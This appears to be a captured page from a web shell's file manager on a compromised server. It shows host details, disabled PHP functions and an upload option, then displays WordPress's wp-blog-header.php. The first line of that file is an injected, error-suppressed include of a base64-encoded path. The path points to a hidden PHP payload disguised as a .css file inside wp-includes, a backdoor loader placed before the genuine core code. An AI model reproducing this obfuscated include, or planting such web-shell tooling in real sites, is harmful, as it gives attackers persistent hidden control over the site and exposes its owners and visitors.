HEX
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System: Linux f31.eelserver.com 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: mtpcompk (1550)
PHP: 8.0.30
Disabled: exec,shell_exec,system,passthru,popen,proc_open
Upload Files
File: /home/mtpcompk/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvbXRwY29tcGsvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvYmxvY2tzL2NvdmVyL3N0eWxlLXJlbC5jc3M=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}